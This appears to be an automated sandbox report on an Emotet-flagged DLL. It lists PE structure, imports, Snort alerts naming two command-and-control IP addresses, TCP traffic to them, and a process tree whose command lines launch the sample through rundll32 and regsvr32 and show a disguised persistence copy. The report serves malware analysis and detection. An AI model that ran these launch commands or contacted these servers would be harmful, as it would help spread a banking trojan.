IMAGE_DIRECTORY_ENTRY_EXPORT	0x50bc0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f538	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x3410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8d000	0x415c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4bd00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47000	0x454	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4f4b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x45bb9	0x45c00	False	0.379756804435	data	6.37093799262	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x47000	0x9c10	0x9e00	False	0.357397151899	data	5.22192082052	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x51000	0x3735c	0x33800	False	0.741035535498	data	6.11335979295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x3410	0x3600	False	0.306640625	data	4.34913645958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8d000	0x8c34	0x8e00	False	0.346308318662	data	4.00973830682	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x89ac0	0x134	data	Chinese	China
RT_CURSOR	0x89bf4	0xb4	data	Chinese	China
RT_CURSOR	0x89ca8	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x89ddc	0x134	data	Chinese	China
RT_CURSOR	0x89f10	0x134	data	Chinese	China
RT_CURSOR	0x8a044	0x134	data	Chinese	China
RT_CURSOR	0x8a178	0x134	data	Chinese	China
RT_CURSOR	0x8a2ac	0x134	data	Chinese	China
RT_CURSOR	0x8a3e0	0x134	data	Chinese	China
RT_CURSOR	0x8a514	0x134	data	Chinese	China
RT_CURSOR	0x8a648	0x134	data	Chinese	China
RT_CURSOR	0x8a77c	0x134	data	Chinese	China
RT_CURSOR	0x8a8b0	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x8a9e4	0x134	data	Chinese	China
RT_CURSOR	0x8ab18	0x134	data	Chinese	China
RT_CURSOR	0x8ac4c	0x134	data	Chinese	China
RT_BITMAP	0x8ad80	0xb8	data	Chinese	China
RT_BITMAP	0x8ae38	0x144	data	Chinese	China
RT_ICON	0x8af7c	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Chinese	China
RT_ICON	0x8b264	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x8b38c	0x33c	data	Chinese	China
RT_DIALOG	0x8b6c8	0xe2	data	Chinese	China
RT_DIALOG	0x8b7ac	0x34	data	Chinese	China
RT_STRING	0x8b7e0	0x4e	data	Chinese	China
RT_STRING	0x8b830	0x2c	data	Chinese	China
RT_STRING	0x8b85c	0x82	data	Chinese	China
RT_STRING	0x8b8e0	0x1d6	data	Chinese	China
RT_STRING	0x8bab8	0x160	data	Chinese	China
RT_STRING	0x8bc18	0x12e	data	Chinese	China
RT_STRING	0x8bd48	0x50	data	Chinese	China
RT_STRING	0x8bd98	0x44	data	Chinese	China
RT_STRING	0x8bddc	0x68	data	Chinese	China
RT_STRING	0x8be44	0x1b8	data	Chinese	China
RT_STRING	0x8bffc	0x104	data	Chinese	China
RT_STRING	0x8c100	0x24	data	Chinese	China
RT_STRING	0x8c124	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x8c154	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x8c178	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c18c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c1f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c204	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c218	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c22c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c240	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c254	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c268	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x8c27c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x8c290	0x22	data	Chinese	China
RT_MANIFEST	0x8c2b4	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetOEMCP, GetCommandLineA, RtlUnwind, ExitProcess, HeapReAlloc, RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, IsValidCodePage, LCMapStringA, LCMapStringW, HeapCreate, HeapDestroy, GetStdHandle, GetCPInfo, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleW, CreateFileA, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedIncrement, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, WritePrivateProfileStringA, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FormatMessageA, LocalFree, lstrlenA, InterlockedDecrement, MulDiv, MultiByteToWideChar, GlobalUnlock, GlobalFree, FreeResource, GlobalAddAtomA, GetCurrentProcessId, GetLastError, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, WideCharToMultiByte, CompareStringA, FindResourceA, LoadResource, LockResource, SizeofResource, InterlockedExchange, GlobalLock, lstrcmpA, GlobalAlloc, GetModuleHandleA, CreateThread, CloseHandle, VirtualProtect, LoadLibraryA, VirtualAlloc, GetProcAddress, SetLastError, Sleep, IsBadReadPtr, GetProcessHeap, VirtualFree, HeapFree, HeapAlloc, FreeLibrary, VirtualQuery, SetHandleCount, GetNativeSystemInfo
USER32.dll	LoadCursorA, GetSysColorBrush, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, GetForegroundWindow, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetMenu, SetForegroundWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetMenuItemID, GetMenuItemCount, GetSubMenu, UnhookWindowsHookEx, GetSysColor, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, GetWindowTextLengthA, GetWindowTextA, GetWindow, SetFocus, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetWindowsHookExA, CallNextHookEx, GetMessageA, DestroyMenu, UpdateWindow, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, SetTimer, IsIconic, KillTimer, LoadIconA, DrawIcon, GetClientRect, SendMessageA, ShowWindow, PostMessageA, GetSystemMetrics, EnableWindow, GetMenu
GDI32.dll	GetStockObject, SelectObject, GetDeviceCaps, DeleteDC, Escape, ExtTextOutA, TextOutA, RectVisible, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, CreateBitmap, PtVisible, GetObjectA, DeleteObject, GetClipBox, SetMapMode, SetTextColor, SetBkColor, RestoreDC, SaveDC, SetViewportOrgEx
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
SHLWAPI.dll	PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WS2_32.dll	htons, setsockopt, sendto, htonl, bind, socket, closesocket, inet_addr, recvfrom, WSACleanup, WSAStartup

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x1001df20

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-18:50:50.021159	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49770	80	192.168.2.4	45.138.98.34
01/14/22-18:50:51.303705	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49771	8080	192.168.2.4	69.16.218.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 19:06:43.494956017 CET	49748	80	192.168.2.3	45.138.98.34
Jan 14, 2022 19:06:43.512077093 CET	80	49748	45.138.98.34	192.168.2.3
Jan 14, 2022 19:06:44.017889977 CET	49748	80	192.168.2.3	45.138.98.34
Jan 14, 2022 19:06:44.034718990 CET	80	49748	45.138.98.34	192.168.2.3
Jan 14, 2022 19:06:44.549163103 CET	49748	80	192.168.2.3	45.138.98.34
Jan 14, 2022 19:06:44.566065073 CET	80	49748	45.138.98.34	192.168.2.3
Jan 14, 2022 19:06:44.573424101 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:44.703136921 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:44.704199076 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:44.733596087 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:44.864475012 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:44.876152039 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:44.876185894 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:44.876276016 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:50.203227043 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:50.332637072 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:50.333211899 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:50.333297014 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:50.337449074 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:50.466900110 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:50.984311104 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:50.984457970 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:53.981331110 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:53.981362104 CET	8080	49749	69.16.218.101	192.168.2.3
Jan 14, 2022 19:06:53.981406927 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:06:53.981439114 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:08:33.398164034 CET	49749	8080	192.168.2.3	69.16.218.101
Jan 14, 2022 19:08:33.398201942 CET	49749	8080	192.168.2.3	69.16.218.101

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: svchost.exe PID: 6772 Parent PID: 572

General

Start time:	19:05:56
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: loaddll32.exe PID: 6788 Parent PID: 4588

General

Start time:	19:05:56
Start date:	14/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll"
Imagebase:	0x9e0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.296629194.0000000002B00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.296654820.0000000002B31000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.321734731.0000000002B00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.299013072.0000000002B00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.299132771.0000000002B31000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 6820 Parent PID: 572

General

Start time:	19:05:56
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6852 Parent PID: 6788

General

Start time:	19:05:56
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6932 Parent PID: 6788

General

Start time:	19:05:57
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll
Imagebase:	0xb60000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.290395049.0000000004991000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.290320378.0000000004960000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6944 Parent PID: 6852

General

Start time:	19:05:57
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
Imagebase:	0xb60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.680318843.00000000032F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.680592852.00000000034C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6952 Parent PID: 572

General

Start time:	19:05:57
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6976 Parent PID: 6788

General

Start time:	19:05:57
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer
Imagebase:	0xb60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336582284.00000000054B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336161253.0000000004DD0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336665007.0000000005610000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336717142.0000000005641000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336600440.00000000054E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336482614.0000000005380000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336517253.00000000053B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7000 Parent PID: 572

General

Start time:	19:05:58
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7048 Parent PID: 572

General

Start time:	19:05:58
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 7112 Parent PID: 6932

General

Start time:	19:05:58
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
Imagebase:	0xb60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 5496 Parent PID: 572

General

Start time:	19:05:59
Start date:	14/01/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff61ed50000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2368 Parent PID: 572

General

Start time:	19:06:00
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 808 Parent PID: 572

General

Start time:	19:06:02
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 6300 Parent PID: 808

General

Start time:	19:06:02
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6788 -ip 6788
Imagebase:	0xbe0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 3428 Parent PID: 6788

General

Start time:	19:06:04
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6788 -s 512
Imagebase:	0xbe0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 204 Parent PID: 572

General

Start time:	19:06:08
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6612 Parent PID: 6944

General

Start time:	19:06:15
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6428 Parent PID: 6976

General

Start time:	19:06:20
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd",JEKd
Imagebase:	0xb60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000015.00000002.339368070.0000000004971000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000015.00000002.339330671.0000000004940000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 6596 Parent PID: 6428

General

Start time:	19:06:21
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oxcjjbulglczzu\tjxbcbc.cmd",DllRegisterServer
Imagebase:	0xb60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1304 Parent PID: 572

General

Start time:	19:06:24
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1356 Parent PID: 572

General

Start time:	19:06:39
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5264 Parent PID: 572

General

Start time:	19:06:54
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 4488 Parent PID: 2368

General

Start time:	19:07:00
Start date:	14/01/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7d7ea0000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4624 Parent PID: 4488

General

Start time:	19:07:01
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

